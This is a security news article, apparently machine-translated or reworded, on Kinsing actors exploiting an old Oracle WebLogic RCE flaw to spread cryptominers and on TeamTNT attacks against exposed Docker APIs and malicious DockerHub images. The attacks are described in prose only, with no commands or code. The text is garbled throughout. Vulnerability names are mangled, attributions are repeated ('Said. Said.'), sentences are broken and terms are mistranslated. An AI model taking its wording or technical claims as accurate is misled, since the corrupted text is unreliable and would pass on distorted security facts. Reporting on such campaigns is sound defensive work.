Malicious actors such as Kinsing leverage both recently disclosed and older security flaws in Oracle WebLogic Server to distribute cryptocurrency mining malware.
operator behind Kinsing malware We have a history of scanning vulnerable servers for inclusion in botnets. ladies’, salt stack, Log4Shell, spring 4 shelland the Atlassian Confluence flaw (CVE-2022-26134).
Kinsing actors are also involved in campaigns against container environments. Misconfigured Docker Daemon API port It launches a cryptominer and then spreads malware to other containers and hosts.
The latest wave of attacks involves weaponization by actors CVE-2020-14882 (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug against an unpatched server that takes control of the server and drops malicious payloads.
This vulnerability is worth noting. exploited in the past Multiple botnets distribute the Monero miner and Tsunami backdoor to infected Linux systems.
Successfully exploited this vulnerability by deploying a shell script that performs a series of actions. /var/log/syslog Turn off Alibaba and Tencent security features and cloud service agents, and kill conflicting miner processes.
The shell script then downloads the Kinsing malware from a remote server while also performing steps to ensure persistence via a cron job.
“Successful exploitation of this vulnerability could lead to an RCE that would allow an attacker to perform a number of malicious activities on an affected system,” Trend Micro said. “This could extend to running malware […] Theft of critical data or even complete control of a compromised machine is possible. ”
TeamTNT actors resurrected in Kangaroo Attack
The development began when Aqua Security researchers identified three new attacks related to another “active” cryptojacking group called TeamTNT, which voluntarily shut down in November 2021.
“TeamTNT is deploying a vanilla container image, alpine, using a command line that scans for a misconfigured Docker Daemon and downloads a shell script (k.sh) to the C2 server,” says Aqua. Security researcher Assaf Morag said. Said.
What’s notable about the attack chain is that it appears to be designed to break. SECP256K1 encryptionIf this succeeds, the actor may be able to compute keys for arbitrary cryptocurrency wallets. In other words, the idea is that he uses the target’s high but illegal computing power to run the ECDLP solver and get the key.
Two other attacks mounted by the group were Published Redis server Improperly configured Docker API for deploying coin miners and Tsunami binaries.
TeamTNT’s Docker REST API target is well documented the past year. but, operational security failure Unveiled credentials associated with two attacker-controlled DockerHub accounts discovered by Trend Micro.
The accounts alpineos and sandeep078 were allegedly used to distribute various malicious payloads, including rootkits, Kubernetes exploit kits, credential stealers, the XMRig Monero miner, and even the Kinsing malware.
“Account alpineos was used for three exploit attempts on our honeypot from mid-September to early October 2021, tracking the IP address of the deployment to a location in Germany,” Trend Micro’s Nitesh Surana said. Said.
“The attacker was logged into an account on the DockerHub registry and probably forgot to log out.” Or “The threat actor logged into the DockerHub account using alpineos credentials.”
Trend Micro said the malicious alpineos image was downloaded more than 150,000 times, adding that it notified Docker about these accounts.
It also recommends configuring REST APIs exposed using TLS to mitigate adversarial (AiTM) attacks and using a credential store. helper Hosts user credentials.